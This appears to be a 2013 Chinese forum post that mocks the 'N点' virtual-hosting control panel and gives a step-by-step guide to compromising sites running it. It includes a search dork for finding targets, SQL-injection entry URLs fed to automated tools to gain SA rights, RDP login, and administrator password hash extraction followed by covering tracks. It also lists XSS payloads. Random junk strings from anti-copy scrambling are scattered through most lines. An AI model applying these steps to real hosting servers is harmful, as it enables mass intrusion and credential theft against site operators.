不得不说N点实在是一个破东西; c' c0 Z" A! F* G! f
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂( X% `, y* N* ?+ I
好吧 抱怨一下就行了 接下来关键的时候到了; q* r) N- F( ^, h
首先百度搜索关键字:inurl: (mmdatabase.asp)/ |# i0 G9 P( Z* i6 T* W
我随便列举一个: www.xxxx.com5 n! E, y: ?" k# ]' z/ d3 H$ |/ f
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1. y6 f" h# N! f6 l6 k
扔入NBSI 或者啊D等各种傻逼工具后% t$ Z& T' \, x5 J+ b X1 @# O0 P5 c
你们会看到是SA权限4 W9 j2 l- X. D7 _
果断3389 上去 hash得到administrator密码
$ I/ k. \) Z) u# L) M0 K+ \4 G) b0 r擦屁股走人~
% A0 U1 Z7 C4 Y4 m+ T2 C经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
% X9 b) y2 ~1 q4 l+ A
" V4 w2 u: _# f" @( T6 `再附上其他几个漏洞页面
3 _+ C# S4 D- g, k% l5 `' W9 v) qSQL:, c) r: l7 |5 p2 R3 t$ e
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
& D7 t" i( z" @http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=116 n. j& H3 o+ }& n1 c( n
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9% U# n8 I0 C' e
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
; g3 A% d& g4 @1 w. kXSS证明:
1 F* g2 Z: L% p8 _( Ahttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”+ Q6 f, O7 V' z$ E5 e* n
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
/ l8 Y' Q0 s6 {7 c* ~; ]6 x: X Zhttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>3 M$ e; t4 j$ k
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜0 B- N0 o+ P$ q z' S& Z) O9 T, a
还是星外吧 你们懂的0 O; c' K9 `4 `8 j. l' S* D; [
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
! {2 d* ]' C. _8 `& g dPS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉7 J9 p/ a! r4 d7 j3 S
——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对